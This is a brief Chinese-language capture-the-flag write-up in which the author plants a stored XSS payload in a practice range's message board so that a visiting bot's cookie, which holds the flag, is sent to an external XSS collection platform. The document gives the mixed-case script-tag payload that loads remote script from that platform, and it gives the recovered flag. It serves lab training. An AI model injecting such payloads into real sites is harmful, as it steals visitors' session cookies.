第四章、为了更多的权限！留言板！

第四章 为了更多的权限！留言板！

0x01. 明确目标

https://hack.zkaq.cn/battle/target?id=4f845e5bd308ba0d

重点是这句话 : flag在cookie里，格式为zkz{..}，xss bot 每10秒访问一次页面

搜嘎四奈 , 我们只需要在留言板中插入能获取cookie的xss即可 , 但愿没有waf

点击传送门 进入靶场

http://59.63.200.79:8004/Feedback.asp

0x02. 开始留言

这个我们需要一个xss平台 , 但是我那又没有那些时间搭建 , 用的是小窝表哥的xss在线平台 , 功能挺多的 , 推荐

小窝表哥的xss在线平台

https://xss.lstazl.com/login/

payload

<sCrIpT SrC=//xss.lstazl.com/xxx></sCrIpT>

这个是别人不能用的昂 , 因为你就算用了 , 你也登录不了平台看不到cookie

接下来就是把payload填写到留言板中 , 提交

0x03. 获取flag

进入xss后台 , 看到打到的cookie , 从中获取falg

获得flag

flag=zkz{xsser-g00d}